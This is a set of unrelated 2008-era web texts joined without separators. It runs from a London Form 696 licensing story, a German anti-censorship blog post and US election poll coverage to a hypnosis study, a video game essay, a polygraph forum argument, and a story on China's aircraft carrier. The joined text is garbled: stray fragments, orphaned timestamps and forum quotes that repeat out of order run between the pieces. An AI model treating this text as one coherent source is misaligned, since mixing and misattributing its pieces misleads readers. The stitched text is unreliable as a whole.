Teenage kicks will be harder to get if publicans and managers of other small venues are forced to comply with a new piece of bureaucracy called Form 696 , a former punk rock star has warned .
The form demands that licensees give police a mass of detail , including the names , aliases , private addresses and phone numbers of all musicians and other performers appearing at their venue , and the ethnic background of the likely audience .
Failure to comply could mean the loss of a licence or even a fine and imprisonment .
The police say they need the information demanded on Form 696 , which runs to eight pages , so they can pinpoint which acts and venues attract troublemakers , and make sure venues are safe .
But Feargal Sharkey , who rose to fame during the punk era as the vocalist on the single " Teenage Kicks " by the Undertones , is so angry about what he sees as a threat to live music that he is consulting lawyers about how to stop it .
Download the new Independent Premium app Sharing the full story , not just the headlines
As the boss of UK Music , which campaigns for musicians , he will be applying next week for a judicial review into whether a local authority has the right to make it a condition of a publican 's licence that they have to fill in Form 696 .
The scheme was introduced by the Metropolitan Police after incidents at live music concerts in 2006 , some involving guns .
In theory , it applies to any licensed premises where there is live entertainment , but Detective Chief Superintendent Richard Martin , head of the Met 's pubs and vice squad , said that in reality it will apply only to performances likely to draw large crowds .
It applies in 21 London boroughs , but professionals in the music business fear that if it becomes accepted , it will be copied in other cities .
Martin Rawlings , director of the Pub and Beer Association , said : " I know of licensees faced with this saying they are just not going to put live music on .
Form 696 is being used only in London so far , but there are similar things going on around the country , where the police are asking publicans to sign various protocols .
It has gone too far , frankly . "
Mr Sharkey has also complained to the Equality and Human Rights Commission that the police appear to be focusing on the music enjoyed by black and Asian teenagers .
One of the questions on the form requires the licensee to specify the type of music that will be performed , giving as possible examples " Bashment , R'n 'B , Garage " .
Another question asks , " Is there a particular ethnic group attending ? "
In a letter to Sir Ian Blair , the Met commissioner , Mr Sharkey said : " In explicitly singling out performances and musical styles favoured by the black community we believe the use of Risk Assessment Form 696 is disproportionate , unacceptable and damaging to live music . "
The Musicians ' Union is also consulting lawyers , because they believe that performers ' privacy is being invaded .
Rick Finlay , 49 , who has been playing drums in London venues for 30 years , warned that even if licensees agree to fill in Form 696 , musicians may not co-operate .
" I would be pretty angry about it , and I can tell you some of my colleagues would refuse to work with me rather than give their details , " he said .
" The last thing they need is a deterrent , which implies that there is something wrong with what they are doing . "
But Det Ch Supt Martin said Form 696 was already making live music in large venues safer .
" It 's not about being risk averse , it 's about managing the risk , " he said .
" If you a publican and you are just having some performers to entertain your regular customers , you wo n't be expected to do a risk assessment .
It 's for when the performance is being put on to draw people in .
We will never assess somebody just on the genre of music they are performing .
There is a whole raft of factors that are taken into account . "
KRILL KILL : Say hello to krill , shrimplike crustaceans that live in the sea .
They are the principal food source for many animals , including penguins , seals and — especially — baleen whales .
In the ocean near the Antarctic Peninsula , krill have plummeted about 80 percent in the past 30 years , which has affected the entire food chain there ...
Flip Nicklin / Minden Pictures
Due to the advances in medicine and protective wear , brave men and women are surviving combat - related injuries at markedly higher rates than in past conflicts .
This means that more fathers , mothers , sons , daughters and best friends are able to come home after being severely wounded .
And these wounded heroes need our support .
Specifically , they need help in adapting to the life - altering changes that come with surviving severe injuries .
For example , many need prosthetic limbs and suffer from post - traumatic stress disorder .
And there 's also a rise in an " invisible wound " , traumatic brain injury .
According to the Walter Reed Army Medical Center , between January 2003 and May 2005 , 31 % of those admitted had some kind of brain injury .
These brave men and women have given so much , and as a nation , we need to care about what happens to them after they come home .
Please tell Congress not to forget about our wounded heroes and support their health care needs .
Schließung der Datenautobahn
Wei schon mehrfach geschrieben , setzt bei den allermeisten deutschen Medien beim Stichwort “ Kinderpornografie ” das rationale Denken komplett aus .
Von seriöser Recherche keine Spur. Die Tagesschau leistete sich gestern eine waschechte Falschmeldung .
Das interessiert natürlich niemanden .
Familienministerin von der Leyen fordert die Sperrung von “ Kinderporno - Websites ” .
Unter der suggestiven Überschrift “ Kinderseelen werden zerfetzt ” sagte sie dem Hamburger Abendblatt : “ Es gibt eine riesige Dunkelziffer .
Es wird immer mehr über kommerzielle Websites verbreitet .
Da werden Millionenbeträge verdient .
Pornografische Videos , auf denen Kinder gequält und gefoltert werden , werden allein in Deutschland bis zu 50000 - mal im Monat heruntergeladen .
(…)
Wir schließen die Datenautobahn der Kinderpornografie .
Das BKA erstellt Listen der kinderpornografischen Websites .
Jetzt sollen die Zugangsanbieter gesetzlich verpflichtet werden , die Listen zu beachten und solche Websites unverzüglich zu schließen .
Der Kunde klickt an und läuft ins Leere – kein Anschluss unter dieser Nummer .
Das ist technisch möglich , und es ist rechtlich möglich . ”
Ist das wahr ?
Natürlich nicht .
“ Dunkelziffern ” riechen bei diesem Thema immer nach Moralthologie und nach einem Vorwand , für den “ Kinderpornografie im Internet ” immer herhalten muss .
Die Zahl des “ Herunterladens ” ist ohnehin frei erfunden : Woher sollten die Ermittler das wissen ?
Ist die Quelle die kläglich verlaufende “ Operation Heiße Luft “ ?
“ Kommerzielle Websites ” ?
Und warum belangt man die nicht ?
Kinderpornografie ist zwar in vielen Ländern unterschiedlich definiert , aber verboten ist sie fast überall .
Da es keine anonymen Websites gibt , könnte man immer herausfinden , wer die Angebote hostet – und wenn es die Lockspitzelangebote des FBI sind ( dem FBI ist so etwas erlaubt ) .
Von der Leyen fordert also eine Art Zensur wie schon in Nordrhein - Westfalen praktiziert : Die Regierung gibt den Providern vor , welche IP - Adressen zu sperren sind .
Natürlich ist so etwas leicht zu umgehen .
Von der Leyen hat also keine Ahnung , wovon sie redet .
Und was macht daraus die Tagesschau ?
Sie behauptet , von der Leyen habe gesagt : “ Die “ polizeibekannten Kinderporno - Seiten im deutschen Netz ” sollten geschlossen werden .
“ Momentan seien das rund 1000 . ”
Das hat die Ministerin mitnichten gesagt .
“ Im deutschen Netz ” , was auch immer das sein soll ( gibt es ein deutsches Internet ? ) , gibt es gar keine Kinderporno - Websites .
Die wäre schon seit dem ersten Hype vor zehn Jahren zum Thema geschlossen worden .
Die Tagesschau suggeriert also eine Gefahr , die es so nicht gibt .
Wie sagte das BKA schon 1998 ganz richtig und immer noch aktuell : Das WWW stelle nicht das Hauptpotential für Straftaten dar .
Das ist keine Erbsenzählerei – ganz im Gegenteil : Sowohl in der Tagesschau als auch bei von der Leyen geht es um das World Wide Web .
Mit Kinderpornografie wird aber nicht dort gehandelt , sondern in anderen Diensten – wie dem IRC oder über Filesharing .
Man kommt im WWW nicht einfach so an eindeutig kinderpornografische Angebote .
Man sperrt auch nicht eine Bahnlinie , wenn man ein Auto daran hindern will , irgendwohin zu fahren , sondern die dementsprechende Straße .
Die Forderung , Websites zu sperren , ist also durchsichtiger und heuchlerischer Populismus .
Die gequälten Kinder werden von der Politik instrumentalisiert , um Zensurmaßnahmen im Internet durchpeitschen zu können .
Das ist ekelhaft .
November 20 , 2008 | abgelegt unter Politics
Kommentare
Urge Congress to Find Rove in Contempt Please , take a few minutes today to let your House member and your Senators know that you are dead serious about holding accountable anyone in the Bush administration who has subverted our constitutional rights , abused their power or broken the law .
You , me , or the rank - in - file citizen would be hammered if we did anything approaching the magnitude of what has happened in this administration .
The war , torture , wiretapping , and the misuse of the Department of Justice for political purposes must not be swept under the rug .
To do so would be an injustice not only to those who have suffered but also , and more importantly , it would endanger the future of our democracy .
If the abuse of power is not investigated , exposed , and held in check and those people responsible are not held accountable then these abuses will become part of our political culture and will likely happen again .
Our democracy has been threatened and it is now up to us to secure its future .
We , the people , must continue to struggle , to fight , to push for the truth in order to restore justice and preserve our democracy .
Congress must act .
The Judiciary Committees and Oversight Committees must investigate .
Please email , write , and call the new Congress asking them to investigate until we know the truth of Karl Rove 's involvement in my prosecution and the extent of his role in the firing of US Attorneys because they would not prosecute political cases .
I need your help .
Our country 's future depends on it .
Don Siegelman
Governor of Alabama 1999 - 2003
Subject :
Dear Member of Congress ,
Congress now has sworn testimony that links Karl Rove to the prosecution of Don Siegelman , a Democrat , while he was the Governor of Alabama , as well as evidence that Karl Rove was behind the firing of the US Attorneys because they refused to pursue his political agenda .
Congress must seek the truth and hold accountable those who were responsible for this and other abuses of power such as the torture of " prisoners of war . "
The citizens of the United States deserve nothing less and for Congress to do less would give a stamp of approval to the shameful , unconstitutional , and perhaps even criminal behavior which has been condoned and covered up by the Bush Department of Justice .
We hereby call on Congress to expose the truth and to Stop The Cover Up !
We will add your signature from the information you provide .
First Name * Last Name * Email * Street * Street 2 City * State / Province * Select a state Alabama Alaska American Samoa Arizona Arkansas California Colorado Connecticut Delaware D.C. Florida Georgia Guam Hawaii Idaho Illinois Indiana Iowa Kansas Kentucky Louisiana Maine Maryland Massachusetts Michigan Minnesota Mississippi Missouri Montana Nebraska Nevada New Hampshire New Jersey New Mexico New York North Carolina North Dakota Northern Mariana Islands Ohio Oklahoma Oregon Pennsylvania Puerto Rico Rhode Island South Carolina South Dakota Tennessee Texas Utah Vermont Virgin Islands Virginia Washington West Virginia Wisconsin Wyoming Armed Forces ( the ) Americas Armed Forces Europe Armed Forces Pacific Alberta British Columbia Manitoba Newfoundland and Labrador New Brunswick Nova Scotia Northwest Territories Nunavut Ontario Prince Edward Island Quebec Saskatchewan Yukon Territory Other Zip / Postal Code * Send an Email
By sending this letter to your Representative , you will also be signing up to receive periodic updates from us , but you can opt out easily at any time .
Gallup : Obama has highest favorability rating of any presidential candidate in 16 years John Byrne
Published : Sunday November 2 , 2008
Print This Email This
If the final USA Today / Gallup poll is any indication , Sen. Barack Obama ( D - IL ) has achieved his widest lead in the presidential race to date .
In addition , Obama 's favorable rating is 62 percent -- the highest of any presidential candidate tracked in Gallup 's final pre-election polls dating back to 1992 .
Obama holds an 11 point lead in the final poll of likely voters taken by the polling organization , up one point from the previous day .
Just a day before the polls open , Obama leads Sen. John McCain ( R - AZ ) , 53 to 42 percent in the Gallup poll .
The numbers are based on interviews conducted by phone on Friday , Saturday and Sunday .
The group surveyed is based on Gallup 's model of those most likely to show up at the polls .
No candidate behind in the Gallup poll at the end of October has ever won the presidency .
Obama is also ahead in the Washington Post ABC poll ( 11 points ) , the CBS / NY Times poll ( 13 points ) , and the CNN poll ( 7 points ) .
Obama leads in six states that went for Bush in 2004 : Real Clear Politics ' average shows Obama ahead in Colorado ( 5.5 percentage points ) , New Mexico ( 7.3 ) , Nevada ( 5.8 ) , Virginia ( 3.8 ) , Pennsylvania ( 7 ) , Florida ( 4.2 ) , Ohio ( 4.2 ) and North Carolina ( 0.3 ) .
McCain leads in the swing states of Arizona ( 3.5 points ) , Georgia ( 3 ) , Montana ( 3.8 ) , Missouri ( 0.7 ) and Indiana ( 0.5 ) .
Also , " Gallup says that when it allocates the 4 % of likely voters who either had no opinion or would not choose between Obama and McCain , it estimates the candidates ' current support levels would most likely be 55 % for Obama , 44 % for McCain . "
Sarah Palin 's popularity is hemorrhaging , the poll says -- 45 percent now rate McCain 's choice as poor , a worse - than - total reversal from a poll directly following the Republican National Convention when 60 percent deemed her selection " excellent " or " good . "
Sen. Joe Biden ( D - DE ) , meanwhile , retains similar numbers to the period following his selection ; 60 percent say his choice was excellent or pretty good , whereas the same figure was 63 percent in early September .
November 10 , 2008 — Patrick Zimmerman
President - elect Obama and Michelle Obama arrived at the White House for their first visit since Obama ’s landslide election victory .
President Bush and first lady Laura Bush were at the South Portico of the White House to greet the Obamas on a sunny fall day with moderate temperatures and colorful autumn leaves .
The Obamas ’ arrival had the look of a foreign head - of - state state visit .
The Obamas were driven up to the South Portico , where they were welcomed by the Bushes and escorted into the Executive Mansion that they ’ll call home in a little more than two months .
Just a couple moments later , Bush and Obama were seen walking along the White House Collonade to the Oval Office .
President - elect Obama Arrives at the White House
Please Remember Me and Bookmark
This :
There have been 124 UK troops killed in operations in Afghanistan More than two - thirds of Britons think UK troops should leave Afghanistan within a year , a BBC poll has found .
Of 1,013 people polled , 68 % - 59 % men and 75 % women - said troops should withdraw within 12 months .
But Farid Popal , the Afghan Embassy 's political affairs secretary , said it was " unrealistic " to expect the force of 8,000 to " just abandon " the country .
Defence Secretary John Hutton has said UK forces in Afghanistan were crucial to British national security .
' Devastating consequences '
The ICM poll was commissioned to coincide with a BBC round - table discussion on the status of Afghanistan .
The age - group most opposed to the war were 18 to 24 - year - olds , 75 % of whom said they wanted troops pulled out .
Mr Popal told the BBC : " While your poll suggests that troops should come home , think about the devastation that it will bring to the local Afghans and think about the consequences of security for the rest of the international community . "
It was done at the bidding of the Americans ...
I just think we should pull out
Simon Jenkins , columnist
Should troops come home ?
Send us your comments
See breakdown of poll results
He added : " It is unrealistic to think that the 8,000 - strong British military will just abandon Helmand province in less than a year 's time . "
Also at the discussion , to be broadcast by BBC Radio 4 on Thursday , was Zarghona Rassa , who chairs the British Afghan Women 's Society .
She told the BBC her " heart goes to people from both sides that are killed in this war " , but she also implored people to take a broader perspective on the conflict .
Ms Rassa said : " Imagine ... if they are out of Afghanistan , would it solve the problem of British society or would it solve the problem of international terrorism ?
" So we should not look narrowly only to one side : we should think about all other aspects of this war . "
' Public opinion '
But another participant , columnist Simon Jenkins , said the government should take notice of the survey .
He told the BBC : " I think the government should always pay attention to public opinion , particularly in matters of war and peace .
It has never received a popular mandate for this war in any realistic sense .
" It was done at the bidding of the Americans - there 's a new American president we might be able to capture something from that but he 's equally in favour of it .
I just think we should pull out . "
I am absolutely clear that our commitment to Afghanistan is first and foremost about the UK 's national security
Defence Secretary John Hutton Full BBC poll results [ 38KB ]
Most computers will open this document automatically , but you may need Adobe Reader Download the reader here
The defence secretary chose the 90th anniversary of the end of World War I on Tuesday to reiterate his reasons for maintaining British troops in Afghanistan .
He said : " I am absolutely clear that our commitment to Afghanistan is first and foremost about the UK 's national security .
" Terrorism poses a direct threat to the security of the British people .
So , let us not for one moment think that it does not threaten our way of life , our values of democracy and human rights . "
He stressed that 2008 had been a tough year for coalition forces and that the coming 12 months were likely to be equally as tough , testing the resolve of the international community .
The Ministry of Defence said the UK was committed to keeping a military presence in Afghanistan until the Afghan government could maintain security and the rule of law in the country .
An MoD spokesman said : " UK military and civilians are playing a vital role in helping the Afghan government to build a better future for Afghanistan .
" In turn , a stable and secure Afghanistan is in the UK national interest , and we must not let it become a training ground for terrorists .
" We need to do more to explain to the UK public why it's so important that the UK continues to support the government of Afghanistan and the international presence in Afghanistan . "
• Should We Bring Home the Troops ? will be broadcast on BBC Radio 4 on Thursday 13 November at 2000 GMT
Return to story
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
This is part of a Super Mario cartoon .
It 's called Super Mario : Depression .
Hit the jump to see the whole thing , I had to cut it into three pieces just to get it up .
It 's freaking weird .
And kind of made me sad .
A world with a depressed Mario is no world I want to live in .
Places to move :
outerspace
your mom 's house
your house
Washington D.C .
Candyland
Mushroom Kingdom
Hit it to check the whole thing out .
Super Mario : Depression [ kontraband ]
Thanks to Emode , who once climbed a magic beanstalk and stole the golden goose from Rip Van Winkle 's gingerbread house but then fell and broke his shell .
He 's healing .
REYKJAVIK , Iceland 
The collapse came so fast it seemed unreal , impossible .
One woman here compared it to being hit by a train .
Another said she felt as if she were watching it through a window .
Another said , “ It feels like you ’ve been put in a prison , and you do n’t know what you did wrong . ”
This country , as modern and sophisticated as it is geographically isolated , still seems to be in shock .
But if the events of last month  the failure of Iceland ’s banks ; the plummeting of its currency ; the first wave of layoffs ; the loss of reputation abroad  felt like a bad dream , Iceland has now awakened to find that it is all coming true .
It is not as if Reykjavik , where about two - thirds of the country ’s 300,000 people live , is filled with bread lines or homeless shanties or looters smashing store windows .
But this city , until recently the center of one of the world ’s fastest economic booms , is now the unhappy site of one of its great crashes .
It is impossible to meet anyone here who has not been profoundly affected by the financial crisis .
Overnight , people lost their savings .
Prices are soaring .
Once - crowded restaurants are almost empty .
Banks are rationing foreign currency , and companies are finding it dauntingly difficult to do business abroad .
Inflation is at 16 percent and rising .
People have stopped traveling overseas .
The local currency , the krona , was 65 to the dollar a year ago ; now it is 130 .
Companies are slashing salaries , reducing workers ’ hours and , in some instances , embarking on mass layoffs .
Chronic pain is a widespread challenge , affecting as many as 50 million Americans , and lacks effective treatment options .
The American College of Rheumatology defines chronic pain as pain occurring at least 4 days per week for at least 3 months .
If there is pain at 11 or more of the 18 defined trigger points , the condition is defined as fibromyalgia .
Both physical and psychological factors are believed to be involved in the development of chronic pain , and individual differences exist in pain sensitivity and tolerance , making treatment difficult .
Current treatment options for chronic pain include analgesic drugs , physical activity and rehabilitation , antidepressant medications , and behavior modification , but patients rarely experience a decrease in symptoms over time .
Since the condition is believed to have biological and psychological causes , new treatment options are focusing on treatment options that enhance mind - body awareness and control .
A study published in BMC Musculoskeletal Disorders in September reports positive effects of hypnosis for the treatment of chronic widespread pain .
Hypnosis is not routinely used in general treatment programs in the United States , but is garnering more attention is recent years , as scientists search for effective , holistic treatment options for chronic pain .
Many small studies have shown that hypnosis can provide at least temporary pain relief , and may also lead to a reduction in pain over time .
Such approaches to pain management can enhance quality of life and reduce disability related to chronic pain .
The current study involved 16 men and women , aged 23 to 54 years , who were randomized to a treatment group or a non-treatment control group .
The treatment group participated in 30 - minute hypnosis treatment sessions once weekly for 10 weeks .
Both groups continued to receive standard treatments , including analgesic and antidepressant drugs , physiotherapy , and chiropractic therapy .
After the initial 10 - week treatment period , the patients in the control group were offered hypnosis therapy .
Patients completed a 25 - item questionnaire evaluating pain , fatigue , concentration problems , activities of daily living , pain interference in work and social life , anxiety and pessimism , and overall quality of life .
These subjective scores were rated on a scale from 1 to 100 , with higher numbers representing more suffering .
In total , 7 patients from the initial treatment group , plus 5 from the original control group , completed hypnosis therapy .
These 12 patients experienced a significant reduction in pain and suffering scores , with a mean improvement of 9.9 points , from 51.5 to 41.6 .
The 7 patients from the initial treatment group experienced a significant score reduction from 62.5 to 55.4 .
The 5 patients who completed hypnosis treatment after participating in the control group experienced a near 13 - point improvement in functioning , with scores decreasing from 35.97 to 23.54 .
The 8 patients in the initial control group showed an increase in suffering , with a near 8 - point score increase from 37.2 to 45.1 .
All 12 patients that completed hypnosis therapy completed follow - up after 1 year , and reported a score of 41.3 , indicating maintenance of quality of life improvement .
All of the patients reported using self - hypnosis methods at least once weekly during the year and would have taken advantage of additional hypnosis therapy if it had been available .
The small sample size and subjective nature of the questionnaire limits widespread application of these results .
Also , the large difference in the baseline scores of the treatment and control groups may indicate unreliability in comparing the 2 groups .
However , many small studies have shown similar results , and a plausible approach to treating chronic pain is to combine pharmacological , physical , and psychological modalities based on each patient ’s needs .
References
Carli G , Suman AL , Biasi G , Marcolongo R , Santarcangelo EL ( 2008 ) .
Paradoxical experience of hypnotic analgesia in low hypnotizable fibromyalgic patients .
Arch Ital Biol , 146 ( 2 ) , 75 - 82 PMID : 18822796
Jan Grøndahl , Elin Rosvold ( 2008 ) .
Hypnosis as a treatment of chronic widespread pain in general practice : A randomized controlled pilot trial BMC Musculoskeletal Disorders , 9 ( 1 ) DOI : 10.1186/1471-2474-9-124
M JENSEN , S HAKIMIAN , L SHERLIN , F FREGNI ( 2008 ) .
New Insights Into Neuromodulatory Approaches for the Treatment of Pain .
The Journal of Pain , 9 ( 3 ) , 193-199 DOI : 10.1016/j.jpain.2007.11.003
Molton IR , Graham C , Stoelb BL , Jensen MP ( 2007 ) .
Current psychological approaches to the management of chronic pain .
Curr Opin Anaesthesiol , 20 ( 5 ) , 485-489 PMID : 16911061
T OSBORNE ( 2006 ) .
Psychologic Interventions for Chronic Pain .
Physical Medicine and Rehabilitation Clinics of North America , 17 ( 2 ) , 415-433 DOI : 10.1016/j.pmr.2005.12.002
About
This site is a forum for contributions from individuals concerning their thoughts on the 2008 American election .
Contributors are from all over the country and the world .
Some write often , some do not .
All photos and writings are the sole property of the writers and photographers and may not be reproduced without permission .
This is too rich .
The creative teams behind South Park and Avenue Q are joining forces to produce Mormon Musical .
Perhaps we ’ll finally get to see the magical underwear ?
More here .
I ’m reminded of this episode of South Park .
If you have the time give it a look ( not safe for work ) .
Here is a clip from that episode .
Post by ILO on 11/17/08 at 6:11 pm
The environment is in trouble .
The economy is even worse .
The election has us all on the edge of our seats .
If you ’re feeling tense , depressed , or just plain old stressed , here are some quick tips to up the optimism .
We face challenges , yes , but there ’s plenty of good if you look around :
Know that you have the power to make positive changes in your life , and that your life will touch the lives of others .
Expect the best .
Remember what you ’re grateful for – every day .
Stay present .
Be willing to let go of your assumptions about yourself and the world .
Remember that what happened in the past will not automatically happen in the future .
Be persistent , assertive and confident .
Acknowledge that pain , disappointment and failure are a part of life – but not all of life .
Make a list of motivating and inspiring quotes .
When you make a plan , believe in it !
Make sure to read about the good news that ’s happening in the world .
Try Great News Network .
Take care of your health and eliminate junk food !
( A good rule of thumb : avoid “ white ” foods . )
Do n’t dwell on the past or obsess over the future .
It ’s hard , but try to focus on the moment .
Get rid of your jangly alarm and wake up to soothing sounds .
Who ever invented the screeching alarm clock , anyway ?
Be open minded to new situations and ideas .
We all have biases that color our judgment and cloud our thinking .
Remember : things change !
Everything changes , and it ’s helpful to accept this rather than resent it .
Instead of worrying about general problems , get more specific to come up with a solution .
Stop taking things so personally .
Try not to internalize what ’s going on around you .
Be generous and help others .
Keep a diary – not just of the bad times , but the good times , too !
Image : elusive .
On Saturday , mourners and conspiracy theorists alike converged on Dealey Plaza in Dallas to commemorate the 45th anniversary of the the assassination of President John F. Kennedy .
Every year this patch of land in the West End becomes a sort of one - stop shop for shadowy speculation and bitter discourse .
All the theories and suppositions are in the same ballpark , and it 's just a matter of which one you subscribe to .
It 's kind of like punk rock .
Most of it sounds the same and all the lyrics deal with familiar themes , but you just have to find a band that strikes you .
Click here for a slideshow .
-- Craig Hlavaty
Looking through my stack of old games the other day , I realized the enormous quantity of games I 've never finished .
It 's an amount that easily dwarfs the number of games I have completed .
I 'm not ashamed of it , and I will lay claim in conversation to having played them .
It 's a glorious thing to walk through life , sampling everything , committing to nothing .
What other medium allows us to be so blithely indifferent to its consumption ?
If you say you 've read a book or seen a movie , there 's an implicit assumption that you watched the entire movie or read the book from cover to cover .
Consuming the totality of a book or a movie is often a defining factor in its quality .
We sheepishly admit to never having finished Moby Dick or we proudly tell people we walked out of Pineapple Express .
But the videogame we never finish is hardly a source of embarrassment or disgust .
We played it , and that is enough .
Why do n't we complete the games we start ?
The industry 's common response is that people do n't have as much time as they once did , or that the modern audience 's tolerance for difficulty is markedly lower than it used to be .
There 's truth to both of these statements , but there 's also a ridiculous nostalgia behind them .
It implies there was a moment before Rock Band and Wii Sports when we all finished Super Mario Bros . and beat Metroid without the help of Justin Bailey .
The late ' 80s and early '90s have become a sugar - coated era in game history that many game developers seem content with simply refining .
In truth , the answer is more complicated than either of the aforementioned explanations .
It bears mentioning that there 's a cultural bias against videogames that keeps deep , prolonged engagement with a game from being socially acceptable .
We bestow finishing difficult books or sitting through long , artistically challenging movies with a dignity playing videogames just does n't have , perhaps deservedly so .
On a cultural level videogames are psychologically moored to the television , an apparatus associated with fleeting thoughts and background noise .
Viewers flip from channel to channel consuming small bits of programming , occasionally tuning in for an unbroken hour of content .
Television and triviality walk hand in hand , and it is not insignificant that videogames are forced to share this space .
For many , videogames are considered an extension of television viewing , something to be cut off or on casually with little regard for the continuity of the experience .
Although this explains why I do n't have a problem heeding recommendations from friends who are only half way through the game in question , it does n't explain why so many of us stop playing a game at the 50 - percent mark .
One major culprit is repetition :
The notion that the first level of Halo is much like the last level of Halo .
I understand and sympathize with the developers ' logic - once you teach the player the basics , he or she will want to be tested .
So the game tests the player , over and over in increasingly more complex ways .
The problem is that despite the developer 's best efforts to reward the player with crazier level designs , wilder power - ups and twists in the storyline , it 's often a matter of diminishing returns from the moment they understand how the game is played .
The gameplay mechanic becomes a fixed thing , unchanging and implemented in exactly the same ways over and over .
Instead of supporting the narrative , repetitive gameplay often undermines it by erasing the distinctions between one level and the next .
th , 2008 at 2:20 pm :
th , 2008 at 2:03 pm :
th , 2008 at 9:06 am :
Polygraphy may be bullshit , but it can be highly lucrative bullshit for those with the right connections
It seems the Department of the Army disagrees with you regarding the value of polyraph .
George W. Maschke wrote on Oct 19 , 2008 at 9:06 am : It seems the Department of the Army disagrees with you regarding the value of polyraph .
To be sure , it does .
But then again , the Department of the Army also disagrees with the
Quote :
I have long maintained that profanity is the refuge of the weak - minded or intellectually maladroit .
You seem to resort to it it whenever you find yourself outside your comfort zone or when you are trying to emphasize a point .
Yes , I used " bullshit " for emphasis , because " humbuggery " and " poppycock " are too quaint .
Quote :
Quote :
It 's worth noting that at least some Islamist insurgents in Iraq are well aware that polygraph " testing " is a fraud .
See " The Myth of the Lie Detector " published in the Iraqi jihadist e-zine , Al - Fath , and available here in English translation .
And for discussion , see Al - Qaeda Has Read The Lie Behind the Lie Detector .
Thoughout your postings I am amazed that you can appear so proud at the prospect that your information is being used by the enemies of our country while denying any responsibility for the translation of that information .
Even if one believes you when you claim you did not translate your book into Arabic or Farsi , I can't help but wonder whether or not you have communictaed the information contained in your book to the enemies of our country , perhaps in another way ?
My question is this :
Have you ever participated in a conversations or correspondance in Arabic , Farsi , Persian , or any of the other languages natively spoken by Al Qaeda , the Taliban , or Islamist insurgents in Iraq or Afganistan in which you describe or explain the countermeasures described in your book ?
Thoughout your postings I am amazed that you can appear so proud at the prospect that your information is being used by the enemies of our country while denying any responsibility for the translation of that information .
Even if one believes you when you claim you did not translate your book into Arabic or Farsi , I can't help but wonder whether or not you have communictaed the information contained in your book to the enemies of our country , perhaps in another way ?
My question is this :
Have you ever participated in a conversations or correspondance in Arabic , Farsi , Persian , or any of the other languages natively spoken by Al Qaeda , the Taliban , or Islamist insurgents in Iraq or Afganistan in which you describe or explain the countermeasures described in your book ?
That 's no business of yours .
SanchoPanza wrote on Oct 19 , 2008 at 2:03 pm: To be sure , it does .
But then again , the Department of the Army also disagrees with the National Academy of Sciences regarding the value of polygraphy .
Yes , I used " bullshit " for emphasis , because " humbuggery " and " poppycock " are too quaint .
Thank you Considering everything else you deny ; your lack of denial here tells me what I need to know .
Did you translate your book into any of those languages ?
Sancho Panza George W. Maschke wrote on Oct 19 , 2008 at 2:20 pm: Thank you Considering everything else you deny ; your lack of denial here tells me what I need to know .
Did you translate your book into any of those languages ?
Sancho Panza
" antisocial "
a Javascript demo by Gasman in association with ZX Spectrum Orchestra
first presented at Sundown 2008
for the chairmanship of the Republican National Committee .
One of the prevailing themes of the Republican Party at the moment is rampant finger - pointing in which just about every faction of the party is blaming every other faction of the party for the fact that they keep losing elections .
First you had moderates blaming the Religious Right while the Right was blaming the Republican leadership for being insufficiently committed to the right - wing agenda and others were blaming the anti-immigration “ nativists . ”
Now comes the Family Research Council complaining that Rep. Pete Sessions , incoming Chairman of the National Republican Congressional Committee , dared to meet with the Log Cabin Republicans and warning that any moves toward treating them like a legitimate element of the party will only undermine the GOP ’s efforts to reach out to Black and Hispanic voters and will ultimately doom the Republicans to being in the minority for the foreseeable future :
According to a press release from the pro-gay “ marriage ” group , Log Cabin Republicans , one of the first stops for the newly elected Chairman of the National Republican Congressional Committee ( NRCC ) , Congressman Pete Sessions ( R - Texas ) , was the fundraising dinner for the homosexual organization .
The release states that Representative Sessions said that the GOP cannot win elections and reach out to voters if it continues to oppose the issues that Log Cabin stands for , presumably including same - sex “ marriage . ”
My team sought clarification from Sessions ’ office and was told he did speak to the Log Cabin group , but that a copy of his remarks was not available .
If the Log Cabin portrayal is true , it is disturbing on a number of accounts .
One , Sessions ’ new position as the head of the NRCC is to train and recruit new candidates for the Republican Party .
If this is his idea of “ campaign advice ” then the Republicans better prepare for a longer term in the minority then they faced prior to 1994 .
Secondly , if the GOP is serious about reaching out to new voters , especially African - Americans and Hispanics , then it should look closely at the exit polls on issues important to families .
Both minority groups strongly support traditional family values that embrace life and protect marriage , two things the Republican Party once stood for also .
Under these circumstances , pro-family voters should reserve judgment about giving their financial support to either political party .
FRC might soon actually have a lot more say in these sorts of matters now that Ken Blackwell , one of its own Senior Fellows , is contemplating his own run for the chairmanship of the Republican National Committee .
MUSIC NEWS - Jerry Reed , 71 , who was known for his on and off screen antics with Burt Reynolds almost as much as for his musical skills , died in hospice care in Nashville today , September 2 , according to the The Tennessean .
He had been ill , suffering from emphysema .
Before he was known as " The Snowman " sidekick in the " Smokey & The Bandit " films , he was already regarded as an accomplished musician , who was known for his guitar work and for hits like " When You 're Hot , You 're Hot , " " Amos Moses , " and " Lord Mr. Ford . "
He also wrote songs for Elvis Presley , Johnny Cash , Porter Wagoner , Brenda Lee and others , according to the paper .
Our condolences to his family .
China already has an extensive navy A senior Chinese defence official has told a British newspaper that any great power would want an aircraft carrier .
Major General Qian Lihua , director of the ministry 's Foreign Affairs Office , said that if China had a carrier , it would not be used for " global reach " .
His comments came amid speculation that China is building its first aircraft carrier , which he did not confirm .
China 's growing naval strength is of interest in Taiwan and the South China Sea where China claims territory .
" The navy of any great power ... has the dream to have one or more aircraft carriers , " Maj Gen Qian said in the interview with the Financial Times newspaper .
" The question is not whether you have an aircraft carrier , but what you do with your aircraft carrier .
US and EU countries ... ask us to send more troops to peacekeeping operations overseas , while ... they still have such arms sales embargoes on China
Major General Qian Lihua
" Navies of great powers with more than 10 aircraft carrier battle groups with strategic military objectives have a different purpose from countries with only one or two carriers used for offshore defence , " he said .
" Even if one day we have an aircraft carrier , unlike another country , we will not use it to pursue global deployment or global reach , " the paper reported .
The newspaper reported that aides said it was the first interview arranged by the defence ministry on its own premises .
It added that though he did not mention the US by name , Maj Gen Qian pointedly contrasted the function of a possible Chinese vessel with the way the US Navy uses its 11 carriers .
Reassurance ?
The newspaper said Maj Gen Qian 's reassurance may not convince those in the region concerned about the People 's Liberation Army having a navy capable of carrying out long - range missions .
Maj Gen Qian declined to comment directly on whether China had decided to build a carrier , the FT reported .
" But in the defence ministry 's most forthright statement yet on the issue he made clear that China had every right to do so , " the newspaper said .
It reported the official as saying that it was " unreasonable " for the West to demand China contribute more to peacekeeping operations at the same time as curbing its military purchases and development .
